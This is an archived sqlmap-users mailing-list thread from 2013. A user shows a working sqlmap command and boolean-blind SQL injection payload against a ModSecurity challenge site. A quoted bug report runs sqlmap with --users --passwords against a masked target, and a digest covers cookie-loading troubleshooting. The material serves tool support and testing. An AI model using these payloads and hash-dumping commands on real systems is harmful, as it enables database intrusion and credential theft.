[sqlmap-users] Old modsecurity challange

[Marcell F. <fod...@gm...>]

Heya,

I had some time to play arround with and old medsecurity challange here:
http://www.modsecurity.org/zero.webappsecurity.com/

I did make this work under sqlmap:

python ./sqlmap.py -u "
http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data
"login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum"
--string "Object moved" --technique "b" --dbms "msaccess" --tamper
"space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:21.0) Gecko/20100101 Firefox/21.0"

I had to remove %0C from space2randomblank to make this work.

Response:

Place: (custom) POST
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: login=asd'and(1)like(DateValue(iif(1=1 AND
5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum
--

Is the challange way outdated or something I do wrong?

M

Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

[Miroslav S. <mir...@gm...>]

Hi.

Have you been able to retrieve user names normally? I mean, were they
normally been displayed in console output?

Also, is boolean technique the only one detected by sqlmap in your case (or
maybe UNION)?

Kind regards,
Miroslav Stampar


On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:

> Hi friend,
>
>
>    Could you help me with this bug ?
>
>
> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ***********************************************
> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
> SQL Server --users --passwords
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap", line 87, in main
> start()
> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
> action()
> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
> conf.dbmsHandler.getPasswordHashes(), "password hash",
> CONTENT_TYPE.PASSWORDS)
> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
> getPasswordHashes
> if user in retrievedUsers:
> TypeError: unhashable type: 'list'
>
> [*] shutting down at 22:54:12
> Thanks
>
> BOB
>
>
>
>
> ------------------ Original ------------------
> *From: * "sqlmap-users-request"<sql...@li...
> >;
> *Date: * May 29, 2013
> *To: * "sqlmap-users"<sql...@li...>;
> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>
> Send sqlmap-users mailing list submissions to
> sql...@li...
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> or, via email, send a message with subject or body 'help' to
> sql...@li...
>
> You can reach the person managing the list at
> sql...@li...
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of sqlmap-users digest..."
>
>
> Today's Topics:
>
>    1. Re: Feature request (David Guimaraes)
>    2. Re: --load-cookies (Dirk Wetter)
>    3. Re: --load-cookies (Miroslav Stampar)
>    4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>       (Miroslav Stampar)
>    5. Re: --load-cookies (Dirk Wetter)
>    6. --host parameter (co...@5i...)
>    7. Sqlmap and direct connect error (???????? ??????)
>    8. Re: --host parameter (Miroslav Stampar)
>    9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>   10. feature request: offline mode for --dns-domain? (buawig)
>   11. feature request: --dns-domain for non-root users (--dns-port)
>       (buawig)
>   12. Domain credentials (Brian Milliron)
>   13. Re: Domain credentials (Brandon Perry)
>   14. Re: feature request: offline mode for --dns-domain?
>       (Miroslav Stampar)
>   15. Re: Domain credentials (Miroslav Stampar)
>   16. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (buawig)
>   17. Re: feature request: fetch DNS queries from DNS server via
>       HTTP (Miroslav Stampar)
>   18. MySQL error based technique bug (Konrads Smelkovs)
>   19. Re: MySQL error based technique bug (Miroslav Stampar)
>   20. SQLmap crashing (Phillip Wylie)
>   21. Re: SQLmap crashing (Miroslav Stampar)
>   22. Custom injection payload in POST (Marcell Fodor)
>   23. Re: SQLmap crashing (Miroslav Stampar)
>   24. I got error on windows (warezhacking)
>   25. Appending to a dump (Stephen Shkardoon)
>   26. Re: Appending to a dump (Miroslav Stampar)
>   27. Re: Appending to a dump (Stephen Shkardoon)
>   28. Re: Appending to a dump (Miroslav Stampar)
>   29. --ignore-404 ? (buawig)
>   30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (buawig)
>   31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>       from 1 for 1) (Miroslav Stampar)
>   33. Re: --ignore-404 ? (Miroslav Stampar)
>   34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>   35. Re: BUG...!!!! o.O (Miroslav Stampar)
>   36. gun...@gm... wants to follow you. Accept?
>       (gun...@gm...)
>   37. Direct access to mysql database (Marcell Fodor)
>   38. Re: Direct access to mysql database (Miroslav Stampar)
>   39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>       (Badoo)
>   40. Not getting any sensitive data from database (Marcell Fodor)
>   41. Re: Not getting any sensitive data from database
>       (Miroslav Stampar)
>   42. unhandled exception (kvasilopoulos)
>   43. [SQLMAP] Unhandled exception for IPv6
>       (e.n...@st...)
>   44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   45. Re: unhandled exception (Miroslav Stampar)
>   46. Passing SOAPAction in --header (Brandon Perry)
>   47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>   48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>   49. Blind SQL Injection question (Guy Dufour)
>   50. Re: Blind SQL Injection question (Chris Oakley)
>   51. Re: Passing SOAPAction in --header (Brandon Perry)
>   52. Re: Passing SOAPAction in --header (Brandon Perry)
>   53. Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Alok Kumar)
>   56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>       (Brandon Perry)
>   57. SQLMAP Bug (Joe O'Hara)
>   58. Re: SQLMAP Bug (Miroslav Stampar)
>   59. [CRITICAL] (Thai Thao)
>   60. Re: [CRITICAL] (Miroslav Stampar)
>   61. Providing multiple dbms (Sebastian Nerz)
>   62. Re: Providing multiple dbms (Miroslav Stampar)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 13 Apr 2013 21:40:39 -0300
> From: David Guimaraes <sk...@gm...>
> Subject: Re: [sqlmap-users] Feature request
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CAJ...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Good question Miroslav.. I tried to think in something that can be
> implemented without ruin sqlmap query schema, but I could not come to any
> conclusion... =(
>
> The thing is, sqlsus use a different approch to dump the data, making this
> kind of thing possible...
>
> The solution that I found in this particular scenario is to use sqlsus,
> unfortunately...
>
> Regards.
>
> David
>
>
> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
> mir...@gm...
> > wrote:
>
> > Hi David.
> >
> > And what do you recommend to be done in case of query with length >
> > max_inj_length?
> >
> > Kind regards,
> > Miroslav Stampar
> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
> >
> >> Hi, I am trying to perform sql injection on a web site but I can not get
> >> successful due to a size limitation on the query sent to the server. The
> >> server is limiting the size of query in 512 bytes only and sqlmap do not
> >> have any customization that allows me to bypass this restriction like
> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
> "autoconf"
> >> that measure the permited query size.
> >>
> >> There is some chance to put this kind of feature in sqlmap?
> >>
> >> Thanks.
> >>
> >> --
> >> David Gomes Guimar?es
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
> >> Rise to greatness in Intel's independent game demo contest.
> >> Compete for recognition, cash, and the chance to get your game
> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
>
>
> --
> David Gomes Guimar?es
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 2
> Date: Mon, 15 Apr 2013 11:36:37 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
> 333995A69E06630B2EB491169F016314
> .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
> .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
> >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
> >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
> >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
> >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> \t  <Cookie>
> >         [..]
> >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
> generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
> >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
> >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
> >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
> >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
> >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
> >         >     >
> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
> >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
> >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
> >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
> >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
> (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
> >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
> >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
> >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
> >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
> >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
> >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 15 Apr 2013 11:45:19 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Dirk Wetter <sp...@dr...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your
> needs?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
> >
> >
> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > > Nevertheless, with the latest commit that check should be "neutralized"
> > now. Could you please retry it now?
> >
> > thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> > hiccups, using the same file:
> >
> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
> bug!
> > Traceback (most recent call last):
> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> > _really_load
> >     assert domain_specified == initial_dot
> > AssertionError
> >
> >   _warn_unhandled_exception()
> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> >
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> > the 999.. looks strange to me.
> >
> > >
> > >
> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> > mir...@gm... <mailto:mir...@gm...>> wrote:
> > >
> > >     Hi Dirk.
> > >
> > >     Well, I would say that you have an expired cookie. Do you see that
> > value 0? That value should be a valid UNIX time representing time of
> cookie
> > expiration. Also, I've just tested that cookie of yours and sqlmap says:
> > "[WARNING] cookie '....' has expired"
> > >
> >
> > that's true but IMO 0 represents just a session cookie. Example:
> >
> > prompt% wget -q -O /dev/null --keep-session-cookies
> > --save-cookies=/dev/stdout bing.com
> > # HTTP cookie file.
> > # Generated by Wget on 2013-04-15 11:23:13.
> > # Edit at your own risk.
> >
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> > AUTOREDIR=0&GEOVAR=&DOB=20130415
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> > D=2781203&MS=2781203&AF=NOFORM
> > .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> >  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> > .bing.com       TRUE    /       FALSE   1429089794      MUID
> >  333995A69E06630B2EB491169F016314
> > .bing.com       TRUE    /       FALSE   0       _SS
> > SID=B954CB7EDF8643CABAD8013F27A241E7
> > .bing.com       TRUE    /       FALSE   0       _HOP
> > .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> > .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> > www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> > www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> > 333995A69E06630B2EB491169F016314
> >
> > prompt%
> >
> > Same parser problem btw if I edit the cookie file and put 1429089794 unix
> > time instead of 0 in there.
> >
> > Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> > but cookies w/ expiration date) and uses the last
> > cookie only for the first 120 tries.
> >
> > Cheers, Dirk
> >
> >
> > >
> > >     Kind regards,
> > >     Miroslav Stampar
> > >
> > >
> > >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
> <mailto:
> > sp...@dr...>> wrote:
> > >
> > >
> > >         Hi Miroslav,
> > >
> > >         thx for your prompt answer.
> > >
> > >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > >         > Hi Dirk.
> > >         >
> > >         > Could you please get the latest revision and retry it again?
> > >         ed5599f: almost the same: with cookie in the header sqlmap
> takes
> > only this one.
> > >         The slight difference seems to be that in the case where I
> > didn't supply a cookie
> > >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> > the server anymore.
> > >         >
> > >         > There was a situation where info messages have been wrongly
> > written that original response contained Set-Cookie in situations like
> > yours.
> > >         >
> > >         > In case that everything stays as it is, I'll need to ask you
> > to provide more details. For example, cookie file would be great.
> > >
> > >         sure, here you go:
> > >
> > >         --snip
> > >         # Netscape HTTP Cookie File
> > >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> >  \t  <Cookie>
> > >         [..]
> > >         --snap
> > >
> > >         They are all session cookies. For easier reading here I put
> some
> > blanks in the line
> > >         above, in "cookie-file" there aren't any though. Cookies were
> > generated with
> > >         stompy and a shell script (looks he same as with
> > >         wget -S -O /dev/null --keep-session-cookies
> > --save-cookies=<file> <URL>)
> > >
> > >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> > file ;-)
> > >
> > >         >
> > >         > Also, please make sure that the cookie file contains proper
> > cookie(s) - domain name should be the same as a domain of target, cookie
> > needs to have a proper valid time, etc.
> > >
> > >         see above.
> > >
> > >         Cheers,
> > >
> > >         Dirk
> > >
> > >         >
> > >         >
> > >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>>> wrote:
> > >         >
> > >         >     Hi Miroslav,
> > >         >
> > >         >     yes unfortunately.
> > >         >
> > >         >     If I omit the cookie line in the request header
> > completely, sqlmap
> > >         >     seems to take the first cookie issued by the server with
> > set-cookie (and
> > >         >     put's it silently in).
> > >         >
> > >         >     Cheers,
> > >         >
> > >         >     Dirk
> > >         >
> > >         >
> > >         >
> > >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > >         >     > Hi.
> > >         >     >
> > >         >     > And this is also happening if you are skipping "Cookie:
> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > >         >     >
> > >         >     > Kind regards,
> > >         >     > Miroslav Stampar
> > >         >     >
> > >         >     >
> > >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> > >         >     >
> > >         >     >
> > >         >     >     Hi folks,
> > >         >     >
> > >         >     >     .... that doesn't work for me. It always uses the
> > cookie supplied
> > >         >     >     (below in $REQUEST, or if I omit the line in
> > $REQUEST the one
> > >         >     >     from the 1st server reply is being used)
> > >         >     >
> > >         >     >     So what is wrong in here:
> > >         >     >
> > >         >     >     cd
> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > >         >     >       --level=2 --risk=2 -r $REQUEST
> > >         >     >
> > >         >     >     The content of the file $REQUEST is:
> > >         >     >
> > >         >     >     POST <URL> HTTP/1.1
> > >         >     >     Host: <HOST>
> > >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT
> 5.2;
> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> > >         >     >     Accept:
> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > >         >     >     Accept-Language: en-US,en;q=0.5
> > >         >     >     Accept-Encoding: gzip, deflate
> > >         >     >     Referer: <Referer>
> > >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > >         >     >     Connection: keep-alive
> > >         >     >     Content-Type: application/x-www-form-urlencoded
> > >         >     >     Content-Length: 67
> > >         >     >
> > >         >     >     <abunchofpostparams>
> > >         >     >
> > >         >     >
> > >         >     >     No hints that cookie-file is not in correct format
> > (I've been through this,
> > >         >     >     at least I think I so ;) ).
> > >         >     >
> > >         >     >     Any insight would be much appreciated.
> > >         >     >
> > >         >     >
> > >         >     >     Cheers,
> > >         >     >
> > >         >     >     Dirk
> > >         >     >
> > >         >     >
> > >         >     >
> >
> ------------------------------------------------------------------------------
> > >         >     >     Precog is a next-generation analytics platform
> > capable of advanced
> > >         >     >     analytics on semi-structured data. The platform
> > includes APIs for building
> > >         >     >     apps and a phenomenal toolset for data science.
> > Developers can use
> > >         >     >     our toolset for easy data analysis & visualization.
> > Get a free account!
> > >         >     >
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > >         >     >     _______________________________________________
> > >         >     >     sqlmap-users mailing list
> > >         >     >     sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>> <mailto:
> > sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>>>
> > >         >     >
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     > --
> > >         >     > Miroslav Stampar
> > >         >     > http://about.me/stamparm
> > >         >
> > >         >
> > >         >
> > >         >
> > >         > --
> > >         > Miroslav Stampar
> > >         > http://about.me/stamparm
> > >
> > >
> > >
> > >
> > >     --
> > >     Miroslav Stampar
> > >     http://about.me/stamparm
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 4
> Date: Mon, 15 Apr 2013 11:46:21 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
> clean_filesystem
> To: Brandon Perry <bpe...@gm...>
> Cc: sqlmap users <sql...@li...>
> Message-ID:
> <CA+9yoX3RNQDm=PqT...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Brandon.
>
> Thank you for your patch and find it now included [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>
>
> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...
> >wrote:
>
> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> > call when self.output_directory is NoneType and clean_system() is called.
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
